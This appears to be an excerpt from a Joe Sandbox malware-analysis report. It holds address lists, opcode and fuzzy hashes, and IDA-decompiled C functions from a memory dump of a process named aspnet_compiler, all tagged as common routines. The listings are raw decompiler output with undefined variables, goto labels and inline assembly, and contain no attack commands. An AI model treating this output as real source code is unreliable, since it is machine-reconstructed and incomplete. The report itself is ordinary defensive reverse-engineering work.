0x0125f011
0x0125f01a
0x0125f01d
0x0125f021
0x0125f028
0x0125f029
0x0125f029
0x0125f02c
0x00000000
0x0125f02c
0x0125eff3
0x0125eff9
0x0125f0ea
0x0125f0ed
0x0125f0ef
0x00000000
0x0125f0ef
0x0125f003
0x012abb12
0x0125f045
0x0125f049
0x0125f051
0x0125f09e
0x0125f0a0
0x0125f0a0
0x0125f09e
0x0125f053
0x0125f064
0x0125f064
0x0125f06b
0x012abb1a
0x012abb1a
0x0125f071
0x0125f071
0x0125f07d
0x0125f082
0x0125f08f
0x0125f08f
0x0125f009
0x0125f00d
0x00000000
0x0125f00d
0x0125efd0
0x0125ef97
0x0125efa5
0x0125efaa
0x00000000
0x0125efac
0x0125efac
0x0125efac
0x00000000
0x0125efb2
0x0125f036
0x0125f03a
0x0125f040
0x0125f090
0x00000000
0x0125f092
0x0125f042
0x00000000
0x0125f042
0x0125efb7
0x0125efb9
0x0125efbc
0x0125efb0
0x0125efb0
0x00000000
0x0125efbe
0x0125efbe
0x0125efc1
0x00000000
0x0125efc1
0x0125efbc
0x0125efaa
0x0125ef91

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction ID: ebbbff2999ef004d812730003b85af7ca98d2df9ea33f4dd7f7c736a14700ae1
Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction Fuzzy Hash: 22513830E24246DFEB65CB6CC2C17EEFBB1AF05314F1881A8DE4553282D7B5AA89C741

Uniqueness

Uniqueness Score: -1.00%

Function 0131740D Relevance: .1, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0131740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E0129D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E0128F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L01264620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L01264620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E0128F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L01264620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}

0x0131740d
0x0131740d
0x01317412
0x01317413
0x01317416
0x01317418
0x0131741c
0x0131741f
0x01317422
0x01317422
0x01317428
0x0131742a
0x0131742a
0x01317451
0x01317432
0x0131744f
0x0131744f
0x00000000
0x01317434
0x01317438
0x01317443
0x01317517
0x01317517
0x0131751a
0x01317535
0x01317520
0x01317527
0x0131752c
0x01317531
0x01317533
0x00000000
0x01317533
0x00000000
0x01317531
0x0131754b
0x0131754f
0x0131755c
0x0131755c
0x0131755f
0x01317560
0x01317561
0x01317562
0x01317563
0x01317568
0x0131756a
0x0131756c
0x0131756d
0x0131756d
0x0131756f
0x01317572
0x01317574
0x01317577
0x0131757c
0x0131757f
0x00000000
0x01317551
0x01317551
0x01317551
0x01317553
0x01317553
0x01317449
0x01317449
0x0131744c
0x0131744c
0x00000000
0x0131744c
0x01317443
0x0131750e
0x01317514
0x01317514
0x01317455
0x01317469
0x0131746d
0x00000000
0x01317473
0x01317473
0x01317476
0x01317480
0x01317484
0x0131748e
0x01317493
0x01317493
0x01317496
0x01317499
0x013174a1
0x013174b1
0x013174b5
0x00000000
0x013174bb
0x013174c1
0x013174c1
0x013174c4
0x013174c5
0x013174c6
0x013174c7
0x013174c8
0x013174cd
0x00000000
0x013174d3
0x013174d3
0x013174d6
0x013174d8
0x013174db
0x013174dd
0x013174e0
0x013174e7
0x013174ee
0x013174ee
0x013174f4
0x013174f9
0x00000000
0x013174fb
0x013174fb
0x013174fd
0x01317500
0x01317503
0x01317505
0x01317505
0x013174f9
0x00000000
0x013174cd
0x013174b5
0x00000000

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction ID: fd1fce869981405d790c26ca0c0572aff5a329737d16f035c40eeccf5bd98db5
Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction Fuzzy Hash: B4519071600646EFDB1ACF18C580A56BBB9FF45308F18C0BAE9089F256E771E945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01272990 Relevance: .1, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E01272990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x131ff00);
				E0129D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x1221664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E0128E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x1221668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E012C51BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x122166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E01272AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E01256600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E01272C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E0125EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E01272AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E01272C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E01272ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E0129D0D1(_t62);
				goto L28;
			}

0x01272990
0x01272992
0x01272997
0x012729a3
0x012729a6
0x012729ab
0x012729ad
0x012729b2
0x012b5c80
0x012729b8
0x012729b8
0x012729bb
0x012729c0
0x012729c5
0x012729c6
0x012729c6
0x012729cb
0x00000000
0x00000000
0x012729cd
0x012729d0
0x012729d9
0x012729db
0x012729dd
0x01272a7f
0x01272a84
0x01272a87
0x01272a89
0x012b5ca1
0x012b5ca3
0x00000000
0x01272a8f
0x01272a8f
0x00000000
0x01272a8f
0x00000000
0x012729e3
0x012729e3
0x012729e3
0x00000000
0x012729e3
0x012729dd
0x00000000
0x012729db
0x012729e6
0x012729e9
0x012729eb
0x012729ed
0x012729f3
0x012729f5
0x012729f8
0x012729fa
0x01272a97
0x01272a9a
0x01272a9d
0x01272add
0x00000000
0x01272a9f
0x01272aa2
0x01272aa5
0x01272aa8
0x01272aab
0x012b5cab
0x012b5caf
0x012b5cc5
0x012b5cda
0x012b5cdc
0x012b5cdf
0x012b5ce5
0x00000000
0x012b5ceb
0x012b5ced
0x012b5cee
0x00000000
0x012b5cee
0x012b5cb1
0x012b5cb4
0x012b5cb9
0x012b5cbb
0x00000000
0x012b5cbd
0x012b5cbd
0x00000000
0x012b5cbd
0x012b5cbb
0x01272ab1
0x01272ab1
0x01272ac4
0x01272ac6
0x01272ac6
0x00000000
0x01272ac6
0x01272aab
0x00000000
0x01272a00
0x01272a09
0x01272a0e
0x01272a21
0x01272a24
0x01272a35
0x01272a3a
0x01272a3d
0x01272a42
0x01272a59
0x01272a59
0x01272a5c
0x01272a5f
0x01272a5f
0x012729fa
0x012729f3
0x01272a64
0x01272a64
0x01272a6b
0x01272a6b
0x01272a6d
0x01272a72
0x00000000

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0a0083836d156afa35146ffe395611f1769d7c5950f683f7632e3be476af403
Instruction ID: 2cf9e9c142000e14bbb5b228449bb4cefb63d7d36104770726f21438459b7f39
Opcode Fuzzy Hash: a0a0083836d156afa35146ffe395611f1769d7c5950f683f7632e3be476af403
Instruction Fuzzy Hash: A4516A7192021ADFDF25DF59C880AEFBBB6BF48350F158119EA14AB320D3759952CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 01274BAD Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E01274BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x133d360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E0124CC50(_t86);
					L11:
					return E0128B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x1338504
				E01262280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E0128FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E0128B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L01264620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E0124CCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x1338504
								E0125FFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E01274F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}

0x01274bad
0x01274bbf
0x01274bc2
0x01274bc6
0x01274bcd
0x01274bd9
0x012b67fe
0x012b6800
0x01274ccc
0x01274ccd
0x01274cb7
0x01274cc9
0x01274cc9
0x01274bdf
0x01274be5
0x00000000
0x00000000
0x01274beb
0x01274bef
0x00000000
0x00000000
0x01274bf5
0x01274bf9
0x01274c06
0x01274c0b
0x01274c17
0x01274c1c
0x01274c1f
0x01274c25
0x01274c33
0x01274c3d
0x01274c40
0x01274c43
0x01274c47
0x01274c4d
0x01274c53
0x01274c54
0x01274c55
0x01274c56
0x01274c5b
0x01274c5c
0x01274c63
0x01274c6b
0x00000000
0x00000000
0x012b6776
0x012b6784
0x012b6784
0x012b679f
0x012b67a7
0x012b67af
0x012b67ce
0x00000000
0x012b67b1
0x012b67b7
0x012b67b8
0x012b67c1
0x012b67d3
0x012b67d9
0x012b67dd
0x01274c94
0x01274c94
0x01274c98
0x01274c9c
0x01274ca3
0x012b67f4
0x012b67f4
0x01274cb5
0x00000000
0x00000000
0x00000000
0x00000000
0x01274cb5
0x01274c79
0x01274c7e
0x01274c89
0x01274c8b
0x01274c8f
0x01274c8f
0x00000000
0x01274c89
0x012b67c3
0x00000000
0x012b67c3
0x012b67af
0x01274c73
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e641c50e359fc1ec53487358545a3a3f8b14e3d6b75e108a14ab57a8d713932
Instruction ID: f6adadb7956e6b7204d57048270196dde95566e83f413f89d6c0b2574f2e6556
Opcode Fuzzy Hash: 2e641c50e359fc1ec53487358545a3a3f8b14e3d6b75e108a14ab57a8d713932
Instruction Fuzzy Hash: 5441DB31A202699FDB25EF68C980FEE77B4EF45750F0100A9EA08AB241D774DE84CB94

Uniqueness

Uniqueness Score: -1.00%

Function 01274D3B Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E01274D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x133d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E0128FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x1337bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E0128B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L01264620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E0124CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E0128B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E0128F380(_t67 + 0xc, 0x1225138, 0x10) == 0) {
								 *0x13360d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E01274F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E01274E70(0x13386b0, 0x1275690, 0, 0) != 0) {
					_t46 = E0124CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}

0x01274d3b
0x01274d4d
0x01274d53
0x01274d58
0x01274d65
0x01274d6c
0x01274d71
0x01274d77
0x01274d7f
0x01274d8c
0x01274d8e
0x01274dad
0x01274db0
0x01274db7
0x01274db8
0x01274db9
0x01274dba
0x01274dbb
0x01274dc1
0x01274dc8
0x01274dcc
0x01274dd5
0x01274dde
0x01274ddf
0x01274de0
0x01274de1
0x01274de6
0x01274de7
0x01274de9
0x01274df3
0x00000000
0x00000000
0x012b6c7c
0x012b6c8a
0x012b6c8a
0x012b6c9d
0x012b6ca7
0x012b6cac
0x012b6cb2
0x012b6cb9
0x00000000
0x012b6cbf
0x012b6cbf
0x00000000
0x012b6cbf
0x012b6cb9
0x01274dfb
0x012b6ccf
0x012b6cd3
0x01274e32
0x01274e39
0x012b6ce0
0x012b6cf2
0x012b6cf2
0x012b6ce0
0x01274e3f
0x01274e41
0x01274e51
0x01274e51
0x01274e03
0x01274e03
0x01274e09
0x01274e0f
0x01274e57
0x00000000
0x00000000
0x01274e1b
0x01274e30
0x01274e5b
0x01274e5b
0x00000000
0x01274e30
0x01274e11
0x01274e11
0x01274e16
0x00000000
0x01274e16
0x01274e01
0x00000000
0x01274e01
0x01274da5
0x012b6c6b
0x00000000
0x01274dab
0x01274dab
0x00000000
0x01274dab

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a8d96cf10ec45ffd24701af2d285ee1732faf67f0ac586d812322495059f201
Instruction ID: 2e4827704f55156ea2df662e94431857a8954100875b3db97b038d33b7e6cc1c
Opcode Fuzzy Hash: 7a8d96cf10ec45ffd24701af2d285ee1732faf67f0ac586d812322495059f201
Instruction Fuzzy Hash: 11412A71A60359AFEB32EF18CC81FBBB7A9EB05724F000499EA4597281D7B4DD40CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0130AA16 Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0130AA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E0130ABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E0130AB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = E0130AC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E012ECB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L012677F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E01267D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0130131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E012ECB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}

0x0130aa1f
0x0130aa21
0x0130aa23
0x0130aa2b
0x0130aa30
0x0130aa36
0x0130aa39
0x0130aa42
0x0130aa75
0x0130aa7a
0x0130aa7c
0x0130aa7c
0x0130aa88
0x0130aa8a
0x0130aa8f
0x0130ab02
0x0130ab04
0x0130aa99
0x0130aaa8
0x0130aaaf
0x0130aab3
0x0130aacc
0x0130aad1
0x0130aad6
0x0130aae0
0x0130aaf3
0x0130aaf9
0x0130aafe
0x0130aafe
0x0130aaf3
0x0130aad6
0x0130aab3
0x0130ab07
0x0130ab0a
0x0130ab11
0x0130ab23
0x0130ab13
0x0130ab1c
0x0130ab1c
0x0130ab2b
0x0130ab44
0x0130ab44
0x0130ab51
0x0130ab51
0x0130aa44
0x0130aa47
0x0130aa4c
0x00000000
0x00000000
0x0130aa5a
0x0130aa64
0x0130aa72
0x00000000
0x0130aa66
0x0130aa66
0x0130aa68
0x0130aa6a
0x00000000
0x0130aa6a

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
Instruction ID: 12dfc514679f880416c46ed8a7bee6ce36a02e5a7be39dadf1228cb53817ed28
